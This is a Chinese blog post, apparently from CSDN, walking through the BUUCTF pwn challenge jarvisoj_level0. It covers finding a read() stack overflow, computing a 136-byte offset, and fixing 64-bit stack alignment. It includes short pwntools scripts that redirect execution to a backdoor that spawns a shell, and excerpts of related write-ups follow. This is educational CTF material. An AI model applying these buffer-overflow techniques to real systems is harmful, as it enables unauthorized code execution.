buuctf之jarvisoj_level0

已于 2024-03-30 22:48:47 修改
阅读量1.5k 收藏 15
点赞数 16
文章标签: 安全 ubuntu
于 2024-03-28 11:29:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54452942/article/details/137105503
版权

一、查看属性

首先还是必要的查看属性环节:

可以知道该文件是一个x86架构下的64位小段ELF程序,开启了栈不可执行(NX)保护,ret2shellcode是不行的

先执行看看

二、静态分析

首先是主函数,这里是有一个输出还是write函数,这里的vulnerable_function函数是必进的,主要功能还是它在实现

进入功能函数可以看到一个read,溢出函数找到了

接下来找找可利用的函数,找到了callsystem函数

其地址,也就是我们最终要返回的地址:0x400596

三、动态分析

我们动态调试一下这个程序,这里我的断点下在了main

然后“n”到功能函数“si”步入,继续“n”到read函数,然后输入几个‘a’:

产看栈空间布局

可以计算出来我们需要填充的字节是136个字节

写程序利用,但是发现问题,利用不了,这里想到了64位程序特有的栈对齐机制,具体原理请看:

用简单的例子讲64位程序的栈空间对齐-优快云博客

from pwn import *

io = process('./level0')
#io = gdb.debug('./level0','break *0x4005a6')

system_addr = 0x400596
payload = 'a' * 136 + p64(system_addr )
io.sendline(payload)
io.interactive()

我们跟进调试一下(只需要把上面代码的io换成被注释的即可):

果然,在调用system时,rsp的地址是以8结尾,没有栈对齐,这里我们只需要在调用sys之前对栈进行一次读写即可

有两种方式:

1、可以看到callsystem函数的第一句是压栈,我们跳过它执行下一句的话,就相当于少压一次栈,这样我们执行system时rsp的地址就会从8变成0

2、找这个程序的ret_gadget,这样我们在‘a’和system_addr之间加一个ret,相当于既可以对栈弹出一次,同时是将system_addr弹出到rip寄存器中

这里我们选择第一种:

from pwn import *

io = process('./level0')
#io = gdb.debug('./level0','break *0x4005a6')

system_addr = 0x400596
payload = 'a' * 136 + p64(system_addr + 1)
io.sendline(payload)
io.interactive()

再次执行:

成功

为萤
关注
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 258
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 388
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
jarvisoj_level2_x64 1(64位ROP,栈溢出)
最新发布
Snk0xHeart的博客
04-15 287
开虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译调用了vulnerable_function函数,其他没啥,点进去看看还是没啥,点进缓冲区buf看看完整代码如下,buf对应第9行buf栈溢出吗?先数一下吧,offset=8*16+8=136然后按Shift+F12找后门函数找到一个system,一个/bin/sh,但是点进去没啥东西的。
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 574
[buuctf]jarvisoj_level0
buuctf jarvisoj_level0
carol2358的博客
04-17 682
栈溢出,然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2440
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 575
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTF Pwn jarvisoj_level21解题步骤
2301_81505831的博客
02-04 389
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 366
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 572
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 651
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1150
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 774
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 386
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
BUUCTF-Pwn-jarvisoj_level0
餐桌上的猫
02-12 375
题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)
BUUCTF-PWN-jarvisoj_level0
Henlenl的博客
05-12 190
文章目录查看文件信息IDA 分析exp 查看文件信息 64位elf文件 IDA 分析 我们来到main()函数 再进入vulnerable_function()函数 典型的read()栈溢出漏洞,buf有0x80 [rbp + 80h] 所以 如果要覆盖的话 需要0x80 + rbp本身的8字节 同时我们发现 callsystem函数 地址为 0x400596,所以payload = ‘a’ * (0x80 + 8) + p64(0x400596) exp from pwn import *
[每日一PWN]BUUCTF jarvisoj_level0
qq_55233040的博客
11-23 236
依旧是基础的ret2text。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值